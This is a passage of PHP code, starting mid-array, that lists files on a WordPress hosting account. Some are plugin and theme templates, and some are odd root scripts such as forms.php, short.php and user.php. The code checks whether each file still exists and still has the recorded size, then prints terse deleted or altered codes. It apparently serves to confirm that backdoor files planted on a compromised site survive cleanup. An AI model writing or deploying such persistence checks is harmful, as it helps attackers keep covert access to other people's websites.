"bd@@301598765@@1019", "/home/eliteewa/public_html/wp-content/plugins/better-search-replace/templates/bsr-sidebar.php"=>"bd@@310720327@@725", "/home/eliteewa/public_html/wp-content/themes/frankfurt-news/template-parts/content-index.php"=>"bd@@310723011@@725", "/home/eliteewa/public_html/forms.php"=>"bd@@310780112@@795", "/home/eliteewa/public_html/short.php"=>"bd@@310780114@@972", "/home/eliteewa/public_html/user.php"=>"bd@@310780115@@580"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d\n"; } } } die('!end!');